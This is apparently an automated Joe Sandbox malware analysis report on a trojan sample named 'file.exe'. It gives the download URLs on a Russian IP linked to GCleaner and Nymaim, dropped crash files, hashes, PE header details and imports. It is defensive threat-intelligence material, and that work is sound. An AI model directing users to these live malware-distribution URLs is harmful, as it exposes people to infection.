http://80.66.75.114/files/downloadN	file.exe, 00000000.00000003.1829531312.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1806125561.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1860003838.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1783507267.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1882788834.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1928050185.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1905305826.00000000008AC000.00000004.00000020.00020000.00000000.sdmp	false	8%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://80.66.75.114/files/downloadL	file.exe, 00000000.00000003.1860003838.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1882788834.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1783507267.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1829531312.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1905305826.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1738300300.0000000000898000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1806125561.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1928050185.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1760828703.000000000089A000.00000004.00000020.00020000.00000000.sdmp	false	9%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://80.66.75.114/files/downloadLMEM	file.exe, 00000000.00000003.1860003838.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1882788834.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1783507267.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1829531312.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1905305826.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1738300300.0000000000898000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1806125561.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1928050185.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1760828703.000000000089A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
80.66.75.114	unknown	Russian Federation		20803	RISS-ASRU	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1500394
Start date and time:	2024-08-28 12:04:05 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 9s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@7/8@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 98% Number of executed functions: 21 Number of non-executed functions: 122
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.182.143.212
Excluded domains from analysis (whitelisted): ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
06:05:36	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
80.66.75.114	SecuriteInfo.com.BScope.Trojan.Zenpak.19405.26576.exe	Get hash	malicious	GCleaner, Nymaim	Browse	80.66.75.114/name
	SecuriteInfo.com.BScope.Trojan.Zenpak.13074.27773.exe	Get hash	malicious	GCleaner, Nymaim	Browse	80.66.75.114/name
	SecuriteInfo.com.Win32.PWSX-gen.9892.2160.exe	Get hash	malicious	GCleaner, Nymaim	Browse	80.66.75.114/name
	jgc7Y97kld.exe	Get hash	malicious	GCleaner, Nymaim	Browse	80.66.75.114/name
	Iw7R00u1Qm.exe	Get hash	malicious	GCleaner	Browse	80.66.75.114/files/download
	OREJGOBLM8.exe	Get hash	malicious	GCleaner	Browse	80.66.75.114/files/download
	inte.exe	Get hash	malicious	GCleaner, Vidar	Browse	80.66.75.114/files/download
	univ.exe	Get hash	malicious	GCleaner, Nymaim	Browse	80.66.75.114/name

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
RISS-ASRU	SecuriteInfo.com.BScope.Trojan.Zenpak.19405.26576.exe	Get hash	malicious	GCleaner, Nymaim	Browse	80.66.75.114
	SecuriteInfo.com.BScope.Trojan.Zenpak.13074.27773.exe	Get hash	malicious	GCleaner, Nymaim	Browse	80.66.75.114
	SecuriteInfo.com.Win32.PWSX-gen.9892.2160.exe	Get hash	malicious	GCleaner, Nymaim	Browse	80.66.75.114
	jgc7Y97kld.exe	Get hash	malicious	GCleaner, Nymaim	Browse	80.66.75.114
	Iw7R00u1Qm.exe	Get hash	malicious	GCleaner	Browse	80.66.75.114
	OREJGOBLM8.exe	Get hash	malicious	GCleaner	Browse	80.66.75.114
	inte.exe	Get hash	malicious	GCleaner, Vidar	Browse	80.66.75.114
	univ.exe	Get hash	malicious	GCleaner, Nymaim	Browse	80.66.75.114
	e2pizCCG3T.exe	Get hash	malicious	Amadey	Browse	80.66.75.214
	vyrcclmm.exe	Get hash	malicious	Tofsee	Browse	80.66.75.11

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_687823f3e027695faa9d88d81b6c04ef2f38cb4_d32b1248_a9fcd368-4032-4731-992d-7df4f590d10d\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9885757457924258
Encrypted:	false
SSDEEP:	192:vHlwDEvGPldtd0swwR6I3js7YWdzuiFyZ24IO8TVB:lGN3eswwRJjAzuiFyY4IO8X
MD5:	37D08B0C72CA94723B40CECD4D40637D
SHA1:	4964A7A067A17C5F2528C939E1CB8DD039382F1C
SHA-256:	AA7FC45F0665CE721CE8150741B1D040FD1F12A18919F548D06A5AAD493C8BDA
SHA-512:	743A54FD82A4BF701530B295711B506DD4CEB8F773B8C4B2C3FD8B8005627D57A6E236D743E4306DC2A3ED34C4D81382A871625146031B22518F2768940E08F1
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.9.3.1.3.1.2.4.6.5.0.0.3.2.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.9.3.1.3.1.2.5.1.1.8.7.7.2.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.9.f.c.d.3.6.8.-.4.0.3.2.-.4.7.3.1.-.9.9.2.d.-.7.d.f.4.f.5.9.0.d.1.0.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.2.3.8.f.c.8.0.-.4.f.0.6.-.4.f.3.d.-.8.7.5.f.-.b.a.1.d.1.0.8.7.1.c.5.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.e.c.-.0.0.0.1.-.0.0.1.4.-.4.f.2.d.-.9.9.b.9.3.1.f.9.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.e.4.9.2.d.7.6.8.e.7.9.7.3.1.6.2.4.b.c.d.f.2.e.7.6.1.5.f.9.1.8.0.0.0.0.f.f.f.f.!.0.0.0.0.3.0.7.a.a.8.2.3.e.4.0.f.0.8.2.f.b.0.f.f.9.9.f.b.6.9.9.6.d.4.f.3.4.c.5.a.b.b.4.5.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.8.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5099.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Wed Aug 28 10:05:24 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	41894
Entropy (8bit):	2.5268013584165483
Encrypted:	false
SSDEEP:	192:IcsXBPhyGYXdSXvTctOKo7IdnwI2PBaBlo8+tRRo5ja6SEAkuIXeTfYI2+x:hYyGwAT7H8wIUJKjisJOrR
MD5:	982F671468F3E962301E35C5805EC501
SHA1:	7D5CB3F48CF7C76A7B4EBF68AB15F3A614C064C4
SHA-256:	E620B988674768C7A1DFC7A6B3F98782693403EEBB1AE83AC498D77B8712E483
SHA-512:	7022DEBE81BC34F726D2EC6129A6970A315B68AB77B433174D12FF2960E98EE3A50A8E5A7AD986D950F9BC383444CBDB37521A96C6FBF53462CAF32A99BE3BE5
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .......d..f............4...............<.......T...N...........T.......8...........T...........x8...k..........L...........8!..............................................................................eJ.......!......GenuineIntel............T...........D..f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER51A4.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8284
Entropy (8bit):	3.6963890958389034
Encrypted:	false
SSDEEP:	192:R6l7wVeJ3Cz6I636Y9BSU90PGgmfBr//ljGrpDt89bGfsf0muAim:R6lXJ+6I636YrSU9CGgmfV/ljdGEfK0
MD5:	A245771AAFDBFBD5625887FFDE03AF8B
SHA1:	7D0141EE9E420503687095DD488AA4E801303A53
SHA-256:	4946E988E166140025C2523093D2DEB283D4F90EE3709307764A66FF661AC175
SHA-512:	6D07BA6A3275A24211E914AF561E97A0C03F679ABC9E6DEDFACAB1D6BA15827F37D854117048877625E592E7083F2F03B60C86B61A3F5ED53E4AE14E619972DF
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.3.5.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER51C4.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4537
Entropy (8bit):	4.429048113573814
Encrypted:	false
SSDEEP:	48:cvIwWl8zsaJg77aI9u5WpW8VYsKYm8M4Jg2F0Wj+q8AG3tz2Ud:uIjfoI7kI7VJJyicdz2Ud
MD5:	93724C0E0657CCF20D51356A8A527C9A
SHA1:	49D138DE7A0E34ADF9FDAB4F5001BE093AB4304C
SHA-256:	8427371BFCEDFCC1289B6FF9161281448803C6E8AA95994B24EDF0395021CBED
SHA-512:	8E823E32415C827A1E4843D42DF939AD24A2CA2916DBC0B597F61919DF488755BA480071BCD9E38C1C4040DF7027FFF0CA4D9FB6302D4AC99BBCDE542021FACE
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="475268" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\add[1].htm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Reputation:	high, very likely benign file
Preview:	0

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\download[1].htm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Reputation:	high, very likely benign file
Preview:	0

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\download[1].htm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Preview:	0

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.465289633423072
Encrypted:	false
SSDEEP:	6144:aIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNPdwBCswSb5:vXD94+WlLZMM6YFH1+5
MD5:	F472E3BC66C7E71DF5FF8BA2396A7E7C
SHA1:	0D42BDDDC0D3B2A61B9D3B93C0D247F73D3DF8D0
SHA-256:	8654E436966EC5E840CD97F1718309B3DC7ABF71A37480ADB92F30EB8CEBECAD
SHA-512:	5C05E497538C982DEB7815A0D1B6F1D4D18CFB3D9C166859EA5FB4D89C1C954AC4D052F0DAB341836486BA8DA7BADAD40D2DA4C0D0F51A0783EBD25E8FC114EC
Malicious:	false
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.K..1................................................................................................................................................................................................................................................................................................................................................(..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.2216502136066145
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	288'256 bytes
MD5:	e0e8e64dfad5b7dcae0d8c569c3995a2
SHA1:	307aa823e40f082fb0ff99fb6996d4f34c5abb45
SHA256:	9f860b523257827deceedaf7f95fba8e45e241602003ead07ad41727dbcd2f4c
SHA512:	49e409041af711ac6ce33ff5870bd8d732d91aa1440cb73558ab846ad6750358ae458246a016e920c993c897e06dbe79601a2c4cf0f0866a678acc9f80056c9f
SSDEEP:	3072:xwySb8zVbbEEyNej1dI0D9R40DWbwtORdekyE22JsH/ES:xwySb8zCEyNAJD9/D7O651Ysf
TLSH:	9D54AD0176FE90E6EEA747305970C6A45E3B7D836BB6428F32703E1FAD732916560B12
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........u...............b~......bK......b.......lF..............bz......bO......bH.....Rich....................PE..L...u.}d...........

File Icon


Icon Hash:	1518111211911209

Static PE Info

General

Entrypoint:	0x4016fc
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x647D9275 [Mon Jun 5 07:44:53 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	1d9d33e4f206a54f8ff0f700699cf53a

Entrypoint Preview

Instruction
call 00007FE824E3D322h
jmp 00007FE824E3A42Eh
mov edi, edi
push ebp
mov ebp, esp
sub esp, 00000328h
mov dword ptr [00435738h], eax
mov dword ptr [00435734h], ecx
mov dword ptr [00435730h], edx
mov dword ptr [0043572Ch], ebx
mov dword ptr [00435728h], esi
mov dword ptr [00435724h], edi
mov word ptr [00435750h], ss
mov word ptr [00435744h], cs
mov word ptr [00435720h], ds
mov word ptr [0043571Ch], es
mov word ptr [00435718h], fs
mov word ptr [00435714h], gs
pushfd
pop dword ptr [00435748h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [0043573Ch], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [00435740h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [0043574Ch], eax
mov eax, dword ptr [ebp-00000320h]
mov dword ptr [00435688h], 00010001h
mov eax, dword ptr [00435740h]
mov dword ptr [0043563Ch], eax
mov dword ptr [00435630h], C0000409h
mov dword ptr [00435634h], 00000001h
mov eax, dword ptr [00434004h]
mov dword ptr [ebp-00000328h], eax
mov eax, dword ptr [00434008h]
mov dword ptr [ebp-00000324h], eax
call dword ptr [000000C4h]

Rich Headers

Programming Language:

[C++] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[IMP] VS2008 SP1 build 30729
[RES] VS2010 build 30319
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x32bdc	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x39000	0x12488	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x329f8	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x329b0	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x31000	0x150	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2f9e3	0x2fa00	7f5bffb43b5b03a0390c727d92058dc3	False	0.671147063648294	data	6.546805702623862	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x31000	0x238e	0x2400	b3b2bd83deb09c9769dc149080356d3b	False	0.3458116319444444	data	4.987489926123125	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x34000	0x3da0	0x1800	4f0447a8ed686f029ff2e96f2d988cad	False	0.23909505208333334	data	2.62529656263443	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x38000	0x51d	0x600	d00a0884dfc2593613905d91d2ea3f37	False	0.015625	data	0.007830200398677895	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x39000	0x12488	0x12600	8bdbd59954f1c144ce4accf6b6cfa5d1	False	0.45669908588435376	data	5.1758578130359005	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x46768	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0			0.7368421052631579
RT_CURSOR	0x46898	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0			0.06130705394190871
RT_ICON	0x396d0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Turkish	Turkey	0.591684434968017
RT_ICON	0x3a578	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Turkish	Turkey	0.6642599277978339
RT_ICON	0x3ae20	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Turkish	Turkey	0.7275345622119815
RT_ICON	0x3b4e8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Turkish	Turkey	0.763728323699422
RT_ICON	0x3ba50	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Turkish	Turkey	0.5485477178423237
RT_ICON	0x3dff8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	Turkish	Turkey	0.6688555347091932
RT_ICON	0x3f0a0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	Turkish	Turkey	0.6872950819672131
RT_ICON	0x3fa28	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Turkish	Turkey	0.8111702127659575
RT_ICON	0x3ff08	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Turkish	Turkey	0.339818763326226
RT_ICON	0x40db0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Turkish	Turkey	0.4675090252707581
RT_ICON	0x41658	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Turkish	Turkey	0.5023041474654378
RT_ICON	0x41d20	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Turkish	Turkey	0.5260115606936416
RT_ICON	0x42288	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Turkish	Turkey	0.4259336099585062
RT_ICON	0x44830	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Turkish	Turkey	0.43363039399624764
RT_ICON	0x458d8	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Turkish	Turkey	0.43565573770491806
RT_ICON	0x46260	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Turkish	Turkey	0.449468085106383
RT_DIALOG	0x49018	0x84	data			0.7651515151515151
RT_STRING	0x490a0	0x334	Matlab v4 mat-file (little endian) u, numeric, rows 0, columns 0			0.4853658536585366
RT_STRING	0x493d8	0x6b2	data			0.43115519253208867
RT_STRING	0x49a90	0x136	data			0.5129032258064516
RT_STRING	0x49bc8	0x66a	data			0.43605359317904996
RT_STRING	0x4a238	0x66e	data			0.4380315917375456
RT_STRING	0x4a8a8	0x548	data			0.44822485207100593
RT_STRING	0x4adf0	0x618	data			0.433974358974359
RT_STRING	0x4b408	0x7a	data			0.6475409836065574
RT_ACCELERATOR	0x46740	0x28	data			1.025
RT_GROUP_CURSOR	0x48e40	0x22	data			1.088235294117647
RT_GROUP_ICON	0x466c8	0x76	data	Turkish	Turkey	0.6694915254237288
RT_GROUP_ICON	0x3fe90	0x76	data	Turkish	Turkey	0.6610169491525424
RT_VERSION	0x48e68	0x1ac	data			0.6004672897196262

Imports

DLL

Import

KERNEL32.dll

DebugActiveProcess, GetNumaNodeProcessorMask, GetConsoleAliasesLengthW, GetDefaultCommConfigW, GetConsoleAliasExesLengthA, WriteConsoleOutputW, InterlockedIncrement, GetEnvironmentStringsW, GetComputerNameW, CallNamedPipeW, GetModuleHandleW, GetUserDefaultLangID, GetCommandLineA, GetSystemTimes, GlobalAlloc, LoadLibraryW, HeapDestroy, LeaveCriticalSection, GlobalFlags, SetConsoleMode, CreateDirectoryA, InterlockedExchange, GetStartupInfoA, GetLastError, GetProcAddress, SetStdHandle, SearchPathA, GetNumaHighestNodeNumber, LoadLibraryA, QueryDosDeviceW, FindNextChangeNotification, FoldStringA, GetModuleFileNameA, FreeEnvironmentStringsW, VirtualProtect, EnumDateFormatsW, LocalSize, FindAtomW, HeapFree, HeapAlloc, EncodePointer, DecodePointer, MultiByteToWideChar, HeapSetInformation, GetStartupInfoW, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapCreate, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameW, Sleep, HeapSize, GetCPInfo, InterlockedDecrement, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, WideCharToMultiByte, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, EnterCriticalSection, HeapReAlloc, RtlUnwind, LCMapStringW, 